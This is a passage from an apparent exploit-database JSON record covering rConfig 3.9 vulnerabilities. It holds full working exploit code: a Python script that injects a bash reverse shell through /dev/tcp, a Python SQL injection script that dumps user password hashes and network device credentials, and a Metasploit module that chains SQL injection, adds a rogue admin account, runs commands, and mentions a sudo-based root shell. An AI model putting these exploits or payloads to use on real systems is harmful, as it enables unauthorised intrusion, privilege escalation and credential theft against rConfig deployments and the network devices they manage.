Execution\r\n# CVE-2019-19509\r\n# Exploit Author: vikingfr\r\n# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)\r\n# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh\r\n# Version: tested v3.9.3\r\n# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24\r\n#\r\n# Notes : If you want to reproduce in your lab environment follow those links :\r\n# http://help.rconfig.com/gettingstarted/installation\r\n# then\r\n# http://help.rconfig.com/gettingstarted/postinstall\r\n#\r\n# $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081\r\n# rconfig - CVE-2019-19509 - Web authenticated RCE\r\n# [+] Logged in successfully, triggering the payload...\r\n# [+] Check your listener !\r\n# ...\r\n# $ nc -nvlp 8081\r\n# listening on [any] 8081 ...\r\n# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34458\r\n# bash: no job control in this shell\r\n# bash-4.2$ id\r\n# id\r\n# uid=48(apache) gid=48(apache) groups=48(apache)\r\n# bash-4.2$ \r\n\r\n#!/usr/bin/python3\r\n\r\nimport requests\r\nimport sys\r\nimport urllib.parse\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\nprint (\"rconfig - CVE-2019-19509 - Web authenticated RCE\")\r\n\r\nif len(sys.argv) != 6:\r\n print (\"[+] Usage : ./rconfig_exploit.py https://target username password yourIP yourPort\")\r\n exit()\r\n\r\ntarget = sys.argv[1]\r\nusername = sys.argv[2]\r\npassword = sys.argv[3]\r\nip = sys.argv[4]\r\nport = sys.argv[5]\r\npayload = '''`bash -i>& /dev/tcp/{0}/{1} 0>&1`'''.format(ip, port)\r\n\r\nrequest = requests.session()\r\n\r\nlogin_info = {\r\n \"user\": username,\r\n \"pass\": password,\r\n \"sublogin\": 1\r\n}\r\n\r\nlogin_request = request.post(\r\n target+\"/lib/crud/userprocess.php\",\r\n login_info,\r\n verify=False,\r\n allow_redirects=True\r\n )\r\n\r\ndashboard_request = request.get(target+\"/dashboard.php\", allow_redirects=False)\r\n\r\nif dashboard_request.status_code == 200:\r\n print (\"[+] Logged in successfully, triggering the payload...\")\r\n encoded_request = target+\"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random\".format(urllib.parse.quote(payload))\r\n print (\"[+] Check your listener !\")\r\n exploit_req = request.get(encoded_request)\r\n\r\nelif dashboard_request.status_code == 302:\r\n print (\"[-] Wrong credentials !\")\r\n exit()\n\n# 0day.today [2020-02-02] #", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33879"}, {"lastseen": "2020-03-13T13:29:07", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2020-03-12T00:00:00", "title": "rConfig 3.9 - (searchColumn) SQL Injection Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220"], "modified": "2020-03-12T00:00:00", "id": "1337DAY-ID-34087", "href": "https://0day.today/exploit/description/34087", "sourceData": "# Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection\r\n# Exploit Author: vikingfr\r\n# CVE-2020-10220\r\n# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py\r\n# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)\r\n# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip\r\n# Install scripts : \r\n# https://www.rconfig.com/downloads/scripts/install_rConfig.sh\r\n# https://www.rconfig.com/downloads/scripts/centos7_install.sh\r\n# https://www.rconfig.com/downloads/scripts/centos6_install.sh\r\n# Version: tested v3.9.4\r\n# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24\r\n#\r\n# Notes : If you want to reproduce in your lab environment follow those links :\r\n# http://help.rconfig.com/gettingstarted/installation\r\n# then\r\n# http://help.rconfig.com/gettingstarted/postinstall\r\n#\r\n# $ python3 rconfig_sqli.py https://1.1.1.1\r\n# rconfig 3.9 - SQL Injection PoC\r\n# [+] Triggering the payloads on https://1.1.1.1/commands.inc.php\r\n# [+] Extracting the current DB name :\r\n# rconfig2\r\n# [+] Extracting 10 first users :\r\n# admin:1:63a9f0ea7bb98050796b649e85481845\r\n# Maybe no more information ?\r\n# Maybe no more information ?\r\n# [snip]\r\n# [+] Extracting 10 first devices :\r\n# 127-0-0-1:127.0.0.1::ocdvulnpass:\r\n# deviceTestName:1.1.1.1:myusertest:mysecret:myenablesecret\r\n# Maybe no more information ?\r\n# Maybe no more information ?\r\n# [snip]\r\n# Done\r\n \r\n\r\n#!/usr/bin/python3\r\nimport requests\r\nimport sys\r\nimport urllib.parse\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\nprint (\"rconfig 3.9 - SQL Injection PoC\")\r\nif len(sys.argv) != 2:\r\n print (\"[+] Usage : ./rconfig_exploit.py https://target\")\r\n exit()\r\n\r\nvuln_page=\"/commands.inc.php\"\r\nvuln_parameters=\"?searchOption=contains&searchField=vuln&search=search&searchColumn=command\"\r\ngiven_target = sys.argv[1]\r\ntarget = given_target\r\ntarget += vuln_page\r\ntarget += vuln_parameters\r\n\r\nrequest = requests.session()\r\ndashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False)\r\n\r\n\r\ndef extractDBinfos(myTarget=None,myPayload=None):\r\n\t\"\"\"\r\n\tExtract information from database\r\n\tArgs:\r\n\t\t- target+payload (String)\r\n\tReturns:\r\n\t\t- payload result (String)\r\n\t\"\"\"\r\n\tresult = \"\"\r\n\tencoded_request = myTarget+myPayload\r\n\texploit_req = request.get(encoded_request)\r\n\tif '[PWN]' in str(exploit_req.content):\r\n\t\tresult = str(exploit_req.content).split('[PWN]')[1]\r\n\telse:\r\n\t\tresult=\"Maybe no more information ?\"\r\n\t\r\n\treturn result\r\n\r\n\r\nif dashboard_request.status_code != 404:\r\n\tprint (\"[+] Triggering the payloads on \"+given_target+vuln_page)\r\n\t# get the db name\r\n\tprint (\"[+] Extracting the current DB name :\")\r\n\tdb_payload = \"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--\"\r\n\tdb_name = extractDBinfos(target,db_payload)\r\n\tprint (db_name)\r\n # DB extract users\r\n\tprint (\"[+] Extracting 10 first users :\")\r\n\tfor i in range (0, 10):\r\n user1_payload=\"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20\"+db_name+\".users+limit+\"+str(i)+\",\"+str(i+1)+\"),NULL--\"\r\n user_h = extractDBinfos(target,user1_payload)\r\n #print (\"[+] Dump device \"+str(i))\r\n print (user_h)\r\n # DB extract devices information\r\n\tprint (\"[+] Extracting 10 first devices :\")\r\n\tfor i in range (0, 10):\r\n device_payload=\"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20\"+db_name+\".nodes+limit+\"+str(i)+\",\"+str(i+1)+\"),NULL--\"\r\n device_h = extractDBinfos(target,device_payload)\r\n #print (\"[+] Dump device \"+str(i))\r\n print (device_h)\r\n \r\n\tprint (\"Done\")\r\n\t \r\nelse:\r\n print (\"[-] Please verify the URI\")\r\n exit()\n\n# 0day.today [2020-03-13] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/34087"}], "metasploit": [{"lastseen": "2021-01-23T00:53:30", "description": "This module exploits multiple vulnerabilities in rConfig version 3.9 in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in the `path` parameter of the ajax archive file functionality within the rConfig web interface in order to execute the payload. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via SQLI. This module has been successfully tested on Rconfig 3.9.3 and 3.9.4. The steps are: 1\\. SQLi on /commands.inc.php allows us to add an administrative user. 2\\. An authenticated session is established with the newly added user 3\\. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to execute the payload. 4\\. Remove the added admin user. Tips : once you get a shell, look at the CVE-2019-19585. You will probably get root because rConfig install script add Apache user to sudoers with nopasswd ;-)\n", "published": "2020-03-12T10:41:12", "type": "metasploit", "title": "Rconfig 3.x Chained Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19585"], "modified": "2020-03-13T09:42:40", "id": "MSF:EXPLOIT/LINUX/HTTP/RCONFIG_AJAXARCHIVEFILES_RCE/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Rconfig 3.x Chained Remote Code Execution',\n 'Description' => '\n This module exploits multiple vulnerabilities in rConfig version 3.9\n in order to execute arbitrary commands.\n This module takes advantage of a command injection vulnerability in the\n `path` parameter of the ajax archive file functionality within the rConfig web\n interface in order to execute the payload.\n Valid credentials for a user with administrative privileges are required.\n However, this module can bypass authentication via SQLI.\n This module has been successfully tested on Rconfig 3.9.3 and 3.9.4.\n The steps are:\n 1. SQLi on /commands.inc.php allows us to add an administrative user.\n 2. An authenticated session is established with the newly added user\n 3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to\n execute the payload.\n 4. Remove the added admin user.\n Tips : once you get a shell, look at the CVE-2019-19585.\n You will probably get root because rConfig install script add Apache user to\n sudoers with nopasswd ;-)\n ',\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Jean-Pascal Thomas', # @vikingfr - Discovery, exploit and Metasploit module\n 'Orange Cyberdefense' # Module tests - greetz : CSR-SO team (https://cyberdefense.orange.com/)\n ],\n 'References' =>\n [\n ['CVE', '2019-19509'], # authenticated rce\n ['CVE', '2020-10220'], # sqli auth bypass\n %w[EDB 47982],\n %w[EDB 48208],\n ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py'], # authenticated RCE\n ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py'] # unauthenticated SQLi\n ],\n 'Platform' => %w[unix linux],\n 'Arch' => ARCH_CMD,\n 'Targets' => [['Auto', {}]],\n 'Privileged' => false,\n 'DisclosureDate' => '2020-03-11',\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true, # HTTPS is required for the module to work because the rConfig php code handle http to https redirects\n 'PAYLOAD' => 'generic/shell_reverse_tcp'\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('TARGETURI', [true, 'Base path to Rconfig', '/'])\n ]\n end\n\n # CHECK IF RCONFIG IS REACHABLE AND INSTALLED\n def check\n vprint_status 'STEP 0: Get rConfig version...'\n res = send_request_cgi!(\n 'method' => 'GET',\n 'uri' => '/login.php'\n )\n if !res || !res.get_html_document\n fail_with(Failure::Unknown, 'Could not check rConfig version')\n end\n if res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 'rConfig Version 3.9'\n print_good('rConfig version 3.9 detected')\n return Exploit::CheckCode::Appears\n elsif res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 'rConfig'\n print_status('rConfig detected, but not version 3.9')\n return Exploit::CheckCode::Detected\n end\n end\n\n # CREATE AN ADMIN USER IN RCONFIG\n def create_rconfig_user(user, _password)\n vprint_status 'STEP 1 : Adding a temporary admin user...'\n fake_id = Rex::Text.rand_text_numeric(3)\n fake_pass = Rex::Text.rand_text_alpha(10)\n fake_pass_md5 = '21232f297a57a5a743894a0e4a801fc3' # hash of 'admin'\n fake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d'\n userleveladmin = 9 # Administrator\n user_sqli = \"command ; INSERT INTO `users` (`id`,`username`,`password`,`userid`,`userlevel`,`email`,`timestamp`,`status`) VALUES (#{fake_id},'#{user}','#{fake_pass_md5}','#{fake_userid_md5}',#{userleveladmin}, '#{user}@domain.com', 1346920339, 1);--\"\n sqli_res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),\n 'method' => 'GET',\n 'vars_get' => {\n 'search' => 'search',\n 'searchOption' => 'contains',\n 'searchField' => 'vuln',\n 'searchColumn' => user_sqli\n }\n )\n unless sqli_res\n print_warning('Failed to create user: Connection failed.')\n return\n end\n print_good \"New temporary user #{user} created\"\n end\n\n # AUTHENTICATE ON RCONFIG\n def login(user, pass)\n vprint_status \"STEP 2: Authenticating as #{user} ...\"\n # get session cookie (PHPSESSID)\n res = send_request_cgi!(\n 'method' => 'GET',\n 'uri' => '/login.php'\n )\n @cookie = res.get_cookies\n if @cookie.empty?\n fail_with Failure::UnexpectedReply, 'Failed to retrieve cookies'\n return\n end\n # authenticate\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'),\n 'cookie' => @cookie,\n 'vars_post' => {\n pass: pass,\n user: user,\n sublogin: 1\n }\n )\n unless res\n print_warning('Failed to authenticate: Connection failed.')\n return\n end\n print_good \"Authenticated as user #{user}\"\n end\n\n def trigger_rce(cmd, _opts = {})\n vprint_status \"STEP 3: Executing the command (#{cmd})\"\n trigger = \"`#{cmd} #`\"\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxArchiveFiles.php'),\n 'cookie' => @cookie,\n 'vars_get' => {\n 'path' => trigger,\n 'ext' => 'random'\n }\n )\n # the page hangs because of the command being executed, so we can't expect HTTP response\n # unless res\n # fail_with Failure::Unreachable, 'Remote Code Execution failed: Connection failed'\n # return\n # end\n # unless res.body.include? '\"success\":true'\n # fail_with Failure::Unknown, 'It seems that the code was not executed'\n # return\n # end\n print_good 'Command sucessfully executed'\n end\n\n # DELETE A USER\n def delete_rconfig_user(user)\n vprint_status 'STEP 4 : Removing the temporary admin user...'\n del_sqli = \"command ; DELETE FROM `users` WHERE `username`='#{user}';--\"\n del_res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),\n 'method' => 'GET',\n 'vars_get' => {\n 'search' => 'search',\n 'searchOption' => 'contains',\n 'searchField' => 'vuln',\n 'searchColumn' => del_sqli\n }\n )\n unless del_res\n print_warning \"Removing user #{user} failed: Connection failed. Please remove it manually.\"\n return\n end\n print_status \"User #{user} removed successfully !\"\n end\n\n def cleanup\n super\n delete_rconfig_user @username if @username\n end\n\n def exploit\n check\n @username = rand_text_alphanumeric(8..12)\n @password = 'admin'\n create_res = create_rconfig_user @username, @password\n login(@username, @password)\n tmp_txt_file = Rex::Text.rand_text_alpha(10)\n tmp_zip_file = Rex::Text.rand_text_alpha(10)\n # The following payload (cf. 2019-19585) can be used to get root rev shell, but some payloads failed to execute (ex : because of quotes stuffs). Too bad :-(\n # trigger_rce(\"touch /tmp/#{tmp_txt_file}.txt;sudo zip -q /tmp/#{tmp_zip_file}.zip /tmp/#{tmp_txt_file}.txt -T -TT '/bin/sh -i>& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 #'\")\n trigger_rce(payload.encoded.to_s)\n end\nend\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb"}], "dsquare": [{"lastseen": "2020-03-27T13:38:22", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220"], "description": "SQL Injection vulnerability in rConfig commands.inc.php\n\nVulnerability Type: SQL Injection", "modified": "2020-03-03T00:00:00", "published": "2020-03-03T00:00:00", "id": "E-703", "href": "", "type": "dsquare", "title": "rConfig 3.9 SQL Injection", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}